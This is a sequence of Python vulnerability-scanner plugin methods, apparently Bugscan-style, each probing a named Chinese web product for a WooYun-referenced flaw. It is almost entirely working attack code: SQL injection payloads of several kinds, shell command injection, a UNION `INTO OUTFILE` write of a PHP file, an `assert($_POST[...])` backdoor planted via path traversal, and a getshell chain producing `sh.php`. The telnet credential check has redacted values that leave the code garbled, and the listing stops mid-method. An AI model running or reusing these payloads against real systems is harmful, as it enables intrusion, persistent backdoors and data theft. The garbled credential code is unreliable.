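def verify(self):
        """Time-based blind SQL injection probe for E-mobile ``diarydo.php``.

        Two GET requests are sent: ``diary_id=1`` to measure a baseline
        response time, then ``diary_id=sleep(5)``.  The target is reported
        when both return HTTP 200, the injected request takes more than 5 s,
        is slower than the baseline, and adds at least 4 s on top of it.

        The relative-delay requirement is the fix: the original compared only
        absolute times, so any host whose normal page already took >5 s
        would have been reported.  This is still a single sample per URL, so
        a one-off network stall can produce a false positive; repeat the
        scan before acting on a hit.

        Side effects: rewrites ``self.target`` to include ``base_path`` and
        writes info/report messages to ``self.output``.  All exceptions are
        caught and logged rather than raised.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            hh = hackhttp.hackhttp()

            # Baseline: a benign id tells us how long a normal page takes.
            baseline_url = self.target + '/E-mobile/diarydo.php?diff=reply&diary_id=1'
            started = time.time()
            code1, _, _, _, _ = hh.http(baseline_url)
            baseline_time = time.time() - started

            # Probe: MySQL sleep(5) in the numeric id stalls a vulnerable host.
            probe_url = self.target + \
                '/E-mobile/diarydo.php?diff=reply&diary_id=sleep(5)'
            started = time.time()
            code2, _, _, _, _ = hh.http(probe_url)
            probe_time = time.time() - started

            # Require a clear delay *relative* to the baseline, not just an
            # absolute 5 s, so slow-but-healthy servers are not reported.
            delayed = (probe_time > 5 and probe_time > baseline_time
                       and probe_time - baseline_time >= 4)
            if code1 == 200 and code2 == 200 and delayed:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))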
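    def verify(self):
        """Boolean-based SQL injection probe for the NC iufo UnitTableRefAction.

        Ref: http://www.wooyun.org/bugs/wooyun-2014-060988

        The same search form is posted twice, once with
        ``refSearchValue='or 1=1--`` and once with ``'or 1=2--``.  If both
        responses are HTTP 200 and the number of ``<tr id='sortItem'>`` result
        rows differs, the value is reaching the SQL query unescaped and the
        target is reported.

        Fix over the original: the row pattern was written as a plain (non-raw)
        string containing a backslash-s escape, which is an invalid escape
        sequence and a SyntaxWarning on Python 3.12+; it is now a raw string
        compiled once and reused for both responses.

        Side effects: rewrites ``self.target`` to include ``base_path``;
        exceptions are logged through ``self.output.info``, never raised.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            hh = hackhttp.hackhttp()
            url = self.target + "/service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false&param_orgpk=level_code&retType=unit_code&Operation=Search&action=nc.ui.iufo.web.reference.base.UnitTableRefAction&method=execute"
            # Shared form fields; only refSearchValue differs between the posts.
            form_prefix = ("TreeSelectedID=&TableSelectedID=&refSearchProp=unit_code"
                           "&refSearchPropLbl=%E5%8D%95%E4%BD%8D%E7%BC%96%E7%A0%81"
                           "&refSearchOper=%3D&refSearchOperLbl=%E7%AD%89%E4%BA%8E"
                           "&refSearchValue=")
            always_true = form_prefix + "%27or+1%3D1--"
            always_false = form_prefix + "%27or+1%3D2--"

            code1, _, res1, _, _ = hh.http(url, post=always_true)
            code2, _, res2, _, _ = hh.http(url, post=always_false)

            if code1 == 200 and code2 == 200:
                # Each result row is rendered as <tr id='sortItem'>; a
                # different row count between 1=1 and 1=2 means the
                # injected condition changed the query's result set.
                row_re = re.compile(r"<tr\s*id='sortItem'")
                true_rows = len(row_re.findall(res1))
                false_rows = len(row_re.findall(res2))
                if true_rows != false_rows:
                    self.output.report(
                        self.vuln,
                        '发现{target}存在{name}漏洞'.format(target=self.target,
                                                      name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))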
    def verify(self):
        """Boolean-based SQL injection probe for ``showkbxx.asp`` / ``shownews.asp``.

        Refs: http://www.wooyun.org/bugs/wooyun-2010-090874
              http://www.wooyun.org/bugs/wooyun-2010-090451

        For each candidate path the ``id`` parameter is sent with an appended
        `` OR 1=1`` and then `` OR 1=2``.  Both responses must be HTTP 200; when
        the ``<div`` tag counts differ, the condition is reaching the query and
        the target is reported.  A report can be emitted once per matching
        path, so two hits on one host are possible.

        Side effects: rewrites ``self.target`` to include ``base_path``; all
        exceptions are logged via ``self.output.info`` rather than raised.
        """
        self.target = self.target.rstrip(
            '/') + '/' + (self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            hh = hackhttp.hackhttp()
            candidate_paths = ('/showkbxx.asp?id=-1', '/shownews.asp?id=-1')
            always_true = '%20OR%201%3D1'
            always_false = '%20OR%201%3D2'
            for path in candidate_paths:
                status_t, _, body_t, _, _ = hh.http(
                    self.target + path + always_true)
                status_f, _, body_f, _, _ = hh.http(
                    self.target + path + always_false)
                if status_t != 200 or status_f != 200:
                    continue
                # Every match is the literal '<div', so comparing the lists is
                # the same as comparing how many were found.
                divs_t = re.findall('<div', body_t)
                divs_f = re.findall('<div', body_f)
                if divs_t != divs_f:
                    self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
                        target=self.target, name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Boolean-based SQL injection probe for ``PubInfo/ldxx.asp?QryId=``.

        Ref: http://www.wooyun.org/bugs/wooyun-2010-078982

        Each candidate path is requested with ``' or '1'='1`` and then
        ``' or '1'='2`` appended to ``QryId``.  The signature this PoC relies
        on is asymmetric: the always-true request is expected to fail with
        HTTP 500 and no ``gray.gif`` in the body, while the always-false one
        returns HTTP 200 containing ``gray.gif``.  Only that exact combination
        is reported; a report may fire once per matching path.

        Side effects: rewrites ``self.target`` to include ``base_path``;
        exceptions are logged, not raised.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            hh = hackhttp.hackhttp()
            candidate_paths = (
                '/PubInfo/ldxx.asp?QryId=1', '/web/PubInfo/ldxx.asp?QryId=1'
            )
            always_true = '%27%20or%20%271%27%3D%271'
            always_false = '%27%20or%20%271%27%3D%272'
            marker = 'gray.gif'
            for path in candidate_paths:
                status_t, _, body_t, _, _ = hh.http(self.target + path + always_true)
                status_f, _, body_f, _, _ = hh.http(self.target + path + always_false)

                true_signature = status_t == 500 and marker not in body_t
                false_signature = status_f == 200 and marker in body_f
                if true_signature and false_signature:
                    self.output.report(
                        self.vuln,
                        '发现{target}存在{name}漏洞'.format(target=self.target,
                                                      name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Command injection probe for ``/acc/network/redial_pppoe.php`` (``wan``).

        Ref: http://www.wooyun.org/bugs/wooyun-2015-0117616

        The ``wan`` parameter is wrapped in shell pipes so that
        ``echo testvul > test.php`` executes on the appliance; the dropped
        file is then fetched and its body checked for the marker.

        NOTE(review): this check is intrusive.  It writes ``test.php`` into
        the target's web tree and never removes it, so an artifact remains on
        the host after the scan.  The status code of the second fetch is not
        examined; only the body is.

        Side effects: rewrites ``self.target`` to include ``base_path``;
        exceptions are logged through ``self.output.info``.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            hh = hackhttp.hackhttp()
            base = self.target
            # Step 1: inject; the surrounding pipes make the shell run the echo.
            inject_url = base + '/acc/network/redial_pppoe.php?wan=%20|%20echo%20testvul%20>%20test.php%20|'
            hh.http(inject_url)
            # Step 2: read back the file the command should have created.
            _, _, body, _, _ = hh.http(base + '/acc/network/test.php')
            if 'testvul' in body:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Time-based (MSSQL ``WAITFOR DELAY``) SQL injection probe for ``checklogin.asp``.

        Ref: http://www.wooyun.org/bugs/wooyun-2010-0107850

        Posts a benign login form, then the same form with
        ``'); WAITFOR DELAY '0:0:5'--`` injected into ``uid``.  The target is
        reported when the second request takes more than 3 s longer than the
        first.  HTTP status codes are not checked, and each timing is a single
        sample, so a transient network stall during the second request can
        yield a false positive.

        Side effects: rewrites ``self.target`` to include ``base_path``;
        exceptions are logged, not raised.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            hh = hackhttp.hackhttp()
            login_url = self.target + '/checklogin.asp'
            benign_form = 'uid=11111111&pwd=11111&imageField2.x=32&imageField2.y=7'
            delayed_form = 'uid=11111111%27%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--&pwd=11111&imageField2.x=32&imageField2.y=7'

            started = time.time()
            hh.http(login_url, benign_form)
            middle = time.time()
            hh.http(login_url, delayed_form)
            finished = time.time()

            baseline = middle - started
            injected = finished - middle
            if injected - baseline > 3:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """UNION-based SQL injection probe for ``/modules/pdflist.aspx?info_id=``.

        Ref: http://www.wooyun.org/bugs/wooyun-2010-0116142

        Two payloads are tried: one building the marker with ``CHAR()+``
        (SQL Server style) and one with ``CHR()||`` from ``DUAL`` (Oracle
        style).  Either response containing the reassembled marker string
        ``qbpkqfaLqmHXluMqpxqq`` causes a report; the status code is not
        checked, and both payloads are always sent, so a host may be reported
        twice.

        Side effects: rewrites ``self.target`` to include ``base_path``;
        exceptions are logged, not raised.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            hh = hackhttp.hackhttp()
            marker = 'qbpkqfaLqmHXluMqpxqq'
            union_payloads = (
                '/modules/pdflist.aspx?info_id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%28113%29%2bCHAR%2898%29%2bCHAR%28112%29%2bCHAR%28107%29%2bCHAR%28113%29%2bCHAR%28102%29%2bCHAR%2897%29%2bCHAR%2876%29%2bCHAR%28113%29%2bCHAR%28109%29%2bCHAR%2872%29%2bCHAR%2888%29%2bCHAR%28108%29%2bCHAR%28117%29%2bCHAR%2877%29%2bCHAR%28113%29%2bCHAR%28112%29%2bCHAR%28120%29%2bCHAR%28113%29%2bCHAR%28113%29%2CNULL%2CNULL%2CNULL--',
                '/modules/pdflist.aspx?info_id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%28102%29%7C%7CCHR%2897%29%7C%7CCHR%2876%29%7C%7CCHR%28113%29%7C%7CCHR%28109%29%7C%7CCHR%2872%29%7C%7CCHR%2888%29%7C%7CCHR%28108%29%7C%7CCHR%28117%29%7C%7CCHR%2877%29%7C%7CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%2CNULL%2CNULL%2CNULL%20FROM%20DUAL--',
            )
            for query in union_payloads:
                _, _, body, _, _ = hh.http(self.target + query)
                if marker not in body:
                    continue
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Boolean-based SQL injection probe for ``/opac/ckmarc.jsp`` (``kzh``).

        Ref: http://www.wooyun.org/bugs/wooyun-2010-0132188

        Posts ``kzh=zyk0040640' AND 1=1 AND 'jyNX'='jyNX`` and then the
        ``1=2`` variant.  Both responses must be HTTP 200; if the number of
        ``</td>`` cells differs between them the injected condition altered
        the query result and the target is reported.

        Side effects: rewrites ``self.target`` to include ``base_path``;
        exceptions are logged, not raised.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            hh = hackhttp.hackhttp()
            endpoint = self.target + '/opac/ckmarc.jsp'
            always_true = 'kzh=zyk0040640%27%20AND%201%3D1%20AND%20%27jyNX%27%3D%27jyNX'
            always_false = 'kzh=zyk0040640%27%20AND%201%3D2%20AND%20%27jyNX%27%3D%27jyNX'
            status_t, _, body_t, _, _ = hh.http(endpoint, always_true)
            status_f, _, body_f, _, _ = hh.http(endpoint, always_false)

            # The matches are all the literal '</td>', so list inequality is
            # just a difference in cell count.
            cells_t = re.findall('</td>', body_t)
            cells_f = re.findall('</td>', body_f)
            both_ok = status_t == 200 and status_f == 200
            if both_ok and cells_t != cells_f:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Error-based SQL Server injection probe for ``csccmise/jczp.asp`` / ``jctxx.asp``.

        Refs: http://www.wooyun.org/bugs/wooyun-2010-0129390
              http://www.wooyun.org/bugs/wooyun-2010-0129392

        ``jcid=1 or 1=@@version --`` forces a type-conversion error that
        echoes the server banner; any response (status other than 0)
        containing ``Microsoft SQL Server`` is reported.  Both paths are
        always probed, so a host can be reported twice.  The original also
        listed ``csccmis/`` and ``csccmissm/`` variants but had them commented
        out; they are not probed here either.

        Side effects: rewrites ``self.target`` to include ``base_path``;
        exceptions are logged, not raised.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            hh = hackhttp.hackhttp()
            base = self.target
            banner = 'Microsoft SQL Server'
            probe_urls = [
                base + '/csccmise/jczp.asp?jcid=1%20or%201=@@version%20--',
                base + '/csccmise/jctxx.asp?jcid=1%20or%201=@@version%20--',
            ]
            for probe_url in probe_urls:
                status, _, body, _, _ = hh.http(probe_url)
                if status == 0 or banner not in body:
                    continue
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Unauthenticated log export check for ``/cgi-pub/exportdata.cgi``.

        Refs: http://www.wooyun.org/bugs/wooyun-2015-098450
              http://www.wooyun.org/bugs/wooyun-2015-0134150

        Requests three export types (intrusion, system and block logs) with a
        fixed date range.  A 200 response whose body contains both
        ``Attack Time`` and ``Action`` is taken as a leaked log table and
        reported; every type is tried, so up to three reports per host.

        Side effects: rewrites ``self.target`` to include ``base_path``;
        exceptions are logged, not raised.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            hh = hackhttp.hackhttp()
            base = self.target
            export_paths = (
                # type=1: intrusion log
                '/cgi-pub/exportdata.cgi?type=1&begintime=20150101&endtime=20150102',
                # type=3: system log
                '/cgi-pub/exportdata.cgi?type=3&begintime=20150101&endtime=20150102',
                # type=12: block log
                '/cgi-pub/exportdata.cgi?type=12&begintime=20150101&endtime=20151218'
            )
            for export_path in export_paths:
                status, _, body, _, _ = hh.http(base + export_path)

                leaked = status == 200 and 'Attack Time' in body and 'Action' in body
                if leaked:
                    self.output.report(
                        self.vuln,
                        '发现{target}存在{name}漏洞'.format(target=self.target,
                                                      name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Time-based (``WAITFOR DELAY``) SQL injection probe for ``DeMandTest.aspx``.

        Ref: https://bugs.shuimugan.com/bug/view?bug_no=102603

        Times a request to the site root as a baseline, then a request with
        ``PLCNr=5;WAITFOR DELAY '0:0:6'--``.  Reported only when the baseline
        was HTTP 200 in under 2 s and the injected request returned HTTP 500,
        took more than 5 s, and was slower than the baseline.  Single samples
        on both sides, so a transient stall can still mislead.

        Side effects: rewrites ``self.target`` to include ``base_path``;
        exceptions are logged, not raised.
        """
        self.target = self.target.rstrip(
            '/') + '/' + (self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            hh = hackhttp.hackhttp()
            base = self.target

            started = time.time()
            base_status, _, _, _, _ = hh.http(base)
            baseline = time.time() - started

            probe_url = base + "/DeMandTest.aspx?B=0&Month=1&PLCNr=5;WAITFOR%20DELAY%20'0:0:6'--&MeterID=1"
            started = time.time()
            probe_status, _, _, _, _ = hh.http(probe_url)
            probe = time.time() - started

            fast_baseline = base_status == 200 and baseline < 2
            slow_probe = probe_status == 500 and probe > baseline and probe > 5
            if fast_baseline and slow_probe:
                self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
                    target=self.target, name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """UNION-based SQL Server injection probe for ``pubinfo/Moreysxk.asp``.

        Appends ``%' UNION ALL SELECT 1,2,3,4,hashbytes('MD5','1234'),...--``
        to ``Qryxmmc`` on each candidate path.  If a 200 response contains
        ``0x81dc9bdb52d04dc20036dbd8313ed055`` (the hex MD5 of ``1234``) the
        fifth column echoed our expression and the target is reported.  Both
        paths are always tried, so a host may be reported twice.

        Side effects: rewrites ``self.target`` to include ``base_path``;
        exceptions are logged, not raised.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            hh = hackhttp.hackhttp()
            md5_of_1234 = '0x81dc9bdb52d04dc20036dbd8313ed055'
            candidate_paths = (
                '/pubinfo/Moreysxk.asp?Qryxmmc=111',
                '/web/pubinfo/Moreysxk.asp?Qryxmmc=111'
            )
            union_suffix = '%25%27%20UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2Csys.fn_varbintohexstr%28hashbytes%28%27MD5%27%2C%271234%27%29%29%2C6%2C7%2C8%2C9--%20%26Qryxkzh%3D1'
            for path in candidate_paths:
                status, _, body, _, _ = hh.http(self.target + path + union_suffix)

                if status != 200 or md5_of_1234 not in body:
                    continue
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
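    def verify(self):
        """Command execution probe for ``/direct/polling/CommandsPolling.php``.

        Ref: http://www.wooyun.org/bugs/wooyun-2015-0140998

        The first POST sends ``cmdParam=qq.com,ifconfig`` with an empty
        ``filename``; the response is expected to reveal the server-side
        path of the result file.  That path (backslashes stripped) is sent
        back as ``filename`` in a second POST, and a 200 response containing
        ``Ethernet  HWaddr`` shows ``ifconfig`` ran on the host.

        Fix over the original: the path was sliced with the raw results of
        ``str.find``; when either marker was missing, ``-1`` produced a
        nonsense slice that was still sent as ``filename``.  The method now
        returns quietly when no path can be located.

        NOTE(review): although only ``ifconfig`` is run, this is real command
        execution on the target, not a passive fingerprint.

        Side effects: rewrites ``self.target`` to include ``base_path``;
        exceptions are logged, not raised.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            hh = hackhttp.hackhttp()
            url = self.target + '/direct/polling/CommandsPolling.php'

            # Step 1: trigger the command and learn where its output went.
            discover = "command=ping&filename=&cmdParam=qq.com,ifconfig"
            _, _, body, _, _ = hh.http(url, post=discover)
            start = body.find('/')
            end = body.find('qq.com')
            if start == -1 or end == -1:
                # No result path in the response: nothing sensible to send.
                return
            filepath = body[start:end + 6].replace('\\', '')

            # Step 2: ask for that file back and look for ifconfig output.
            fetch = "command=ping&filename=%s&cmdParam=qq.com,ifconfig" % filepath
            code, _, body, _, _ = hh.http(url, post=fetch)
            if code == 200 and 'Ethernet  HWaddr' in body:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))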
    def verify(self):
        """Code-execution probe via ``search.php`` path traversal into the ``jf`` admin hack.

        Ref: http://www.wooyun.org/bugs/wooyun-2015-0122599

        The first GET abuses ``postdb[city_id]=../../admin/hack`` to reach the
        ``jfadmin`` add-entry action with ``title=${@assert($_POST[yu])}``.
        The second request posts ``yu=phpinfo();`` to ``/do/jf.php``; a 500
        response containing both ``phpinfo()`` and ``AUTH_PASSWORD`` is
        reported.

        NOTE(review): this is far more intrusive than a scan should be.  The
        ``title`` value appears to be stored server-side and later evaluated,
        i.e. the check plants a persistent ``assert($_POST[...])`` backdoor
        that anyone can drive, and nothing here removes it.  The second
        request also dumps ``phpinfo()`` on the target.  Confirm the storage
        behaviour before running this against anything you do not own.

        Side effects: rewrites ``self.target`` to include ``base_path``;
        exceptions are logged, not raised.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            hh = hackhttp.hackhttp()
            plant_url = self.target + '/search.php?mid=1&action=search&keyword=asd&postdb[city_id]=../../admin/hack&hack=jfadmin&action=addjf&Apower[jfadmin_mod]=1&fid=1&title=${@assert($_POST[yu])}'
            trigger_url = self.target + '/do/jf.php'
            trigger_body = 'yu=phpinfo();'

            hh.http(plant_url)
            status, _, body, _, _ = hh.http(trigger_url, post=trigger_body)

            executed = (status == 500 and 'phpinfo()' in body
                        and 'AUTH_PASSWORD' in body)
            if executed:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
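    def verify(self):
        """Weaver e-office ``INTO OUTFILE`` getshell probe via ``group_xml.php?par=``.

        Ref: http://www.wooyun.org/bugs/wooyun-2010-0128007

        Builds a base64-encoded ``par`` value whose ``groupid`` field carries a
        UNION that writes ``0x3c3f...3f3e`` — the hex form of
        ``<?php echo md5(1); ?>`` — to ``../webroot/<filename>``.  If that
        request returns 200, the new file is fetched and a 200 body containing
        the MD5 of ``1`` confirms the write (and therefore file-write SQL
        injection) succeeded.

        Fix over the original: the outfile path lost its ``{filename}``
        placeholder, so ``.format(filename=...)`` substituted nothing and the
        follow-up fetch looked for a file that was never written.  The
        placeholder is restored so the written and fetched names match.

        NOTE(review): this drops a PHP file into the target's web root and
        never removes it; the random suffix only avoids collisions between
        scans and is not a secret.  ``base64.b64encode`` is applied to a
        ``str`` here, which is the Python 2 behaviour this code was written
        for; on Python 3 it needs ``bytes`` in and gives ``bytes`` out.

        Side effects: rewrites ``self.target`` to include ``base_path``;
        exceptions are logged, not raised.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            hh = hackhttp.hackhttp()
            base = self.target
            md5_of_1 = 'c4ca4238a0b923820dcc509a6f75849b'
            # Per-scan name so repeated runs do not overwrite each other.
            filename = 'wtFtw' + str(random.randint(111, 999)) + '.php'
            payload = ('[group]:[1]|[groupid]:[1 union select '
                       '0x3c3f706870206563686f206d64352831293b203f3e,2,3,4,5,6,7,8 '
                       'into outfile \'../webroot/{filename}\']').format(
                           filename=filename)
            payload = base64.b64encode(payload)
            inject_url = base + '/inc/group_user_list/group_xml.php?par=' + payload
            status, _, _, _, _ = hh.http(inject_url)

            if status == 200:
                # Read back the file the UNION should have written.
                status, _, body, _, _ = hh.http(base + '/' + filename)
                if status == 200 and md5_of_1 in body:
                    self.output.report(
                        self.vuln,
                        '发现{target}存在{name}漏洞'.format(target=self.target,
                                                      name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))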
    def verify(self) -> None:
        """Telnet default-credential check (port 23).

        Opens a Telnet session to the target, sends a username and password,
        then sends ``?`` and reports the host if the help output contains
        both the ``->`` prompt and the word ``exec``.

        NOTE(review): the credential literals on the ``user``/``password``
        lines and in the ``read_until`` call appear to have been redacted
        (``******``) when this listing was published; as shown, those lines
        are not valid Python and the original values cannot be recovered from
        here.  Also note that ``self.target`` is rebuilt above as a URL-style
        string with ``base_path`` appended before being handed to
        ``telnetlib.Telnet`` as a host name — confirm what ``self.target``
        holds at that point, because a scheme or path would not resolve.

        Side effects: rewrites ``self.target``; the inner ``except`` swallows
        every Telnet error silently, so a connection failure is
        indistinguishable from "not vulnerable".
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            hh = hackhttp.hackhttp()
            arg = self.target
            port = 23
            # Connection timeout in seconds; this local shadows the `time`
            # module name within the method (the module is not used here).
            time = 5
            # Credentials redacted in the published source; see docstring.
            user = '******'
            password = '******'%s\') = %u'
            # Prompt string the session is read up to after each command.
            finish = '->'
            try:
                t = telnetlib.Telnet(arg, port, timeout=time)
                t.write(user + '\n')
                t.read_until('password: '******'\n')
                str1 = t.read_until(finish)
                # Ask for the command list; a live shell echoes it back.
                t.write("?\n")
                # Note: `str` shadows the builtin for the rest of this block.
                str = t.read_until(finish)
                t.close()
                if ('->' in str) and ('exec' in str):
                    # security_hole(arg)
                    self.output.report(
                        self.vuln,
                        '发现{target}存在{name}漏洞'.format(target=self.target,
                                                      name=self.vuln.name))

            except Exception as e:
                # Best-effort: any Telnet failure is treated as "no finding".
                pass

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def exploit(self):
        """Getshell chain through the unauthenticated ``/manager/config_SSO.php``.

        Ref: wooyun-2014-077033

        1. GET the page; ``os_name`` and ``telnet_os_login_mes`` in a 200
           body indicate it is reachable without authentication.
        2. POST ``type_mode=5201314<?php echo md5(3.14);?>`` with
           ``os_name=HP_11`` so the PHP snippet lands in the HP_11 template.
        3. POST an ``os_name`` containing a piped ``cp`` that copies
           ``Template.cnf`` to ``/usr/local/apache2/htdocs/project/www/sh.php``.
        4. GET ``/sh.php``; a 200 body containing the MD5 of ``3.14``
           confirms execution, and the shell URL is included in the report.

        NOTE(review): this is destructive.  It modifies the target's SSO
        configuration template (step 2) and leaves ``sh.php`` in the web root
        (step 3); neither is reverted.  It also runs a command on the host
        via the ``os_name`` pipe.  Step 2's write is inferred from the follow
        up copy — confirm on a test device.

        Side effects: rewrites ``self.target`` to include ``base_path``;
        exceptions are logged, not raised.
        """
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            hh = hackhttp.hackhttp()
            base = self.target
            config_url = base + '/manager/config_SSO.php'
            status, _, body, _, _ = hh.http(config_url)
            reachable = (status == 200 and 'os_name' in body
                         and 'telnet_os_login_mes' in body)
            if not reachable:
                return

            # Plant the PHP snippet in the HP_11 template ...
            plant_body = "type_mode=5201314<?php echo md5(3.14);?>&os_name=HP_11&config_flag=1"
            hh.http(config_url, plant_body)
            # ... then copy that template into the web root as sh.php.
            copy_body = "os_name=a%20|cp%20/usr/local/keyou/Config/sso/HP_11/Template.cnf%20/usr/local/apache2/htdocs/project/www/sh.php%20|&config_flag=1"
            hh.http(config_url, copy_body)

            shell_url = base + '/sh.php'
            status, _, body, _, _ = hh.http(shell_url)
            md5_of_3_14 = '4beed3b9c4a886067de0e3a094246f78'
            if status == 200 and md5_of_3_14 in body:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞,获取shell为:{shell}'.format(
                        target=self.target,
                        name=self.vuln.name,
                        shell=shell_url))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self):
        """Error-based (MySQL ``extractvalue``) SQL injection probe for ``/WebPages/*.php``.

        Refs: http://www.wooyun.org/bugs/wooyun-2014-058932
              http://www.wooyun.org/bugs/wooyun-2014-058971
              http://www.wooyun.org/bugs/wooyun-2014-058988
              http://www.wooyun.org/bugs/wooyun-2014-077810

        Each URL injects ``extractvalue(0x1, concat(0x23, (select md5(1))))``
        so the XPath error message carries ``#`` followed by the MD5 of ``1``.
        A 200 response containing that hash is reported.  The expected string
        is deliberately the first 31 characters of the hash — presumably
        because the error text is truncated after the leading ``#`` — so do
        not "fix" it to the full 32.  All three URLs are always requested, so
        a host can be reported up to three times.

        Side effects: rewrites ``self.target`` to include ``base_path``;
        exceptions are logged, not raised.
        """
        self.target = self.target.rstrip(
            '/') + '/' + (self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            hh = hackhttp.hackhttp()
            base = self.target
            # Error-based injection: the hash is leaked through the XPath error.
            probe_urls = (
                base + '/WebPages/history.php?uid=1%20and%20extractvalue(0x1,concat(0x23,(select%20md5(1))))',
                base + '/WebPages/applyhardware.php?action=applyhardware&hard_user=test%2527%20and%20extractvalue(0x1,concat(0x23,(select%20md5(1))))%23',
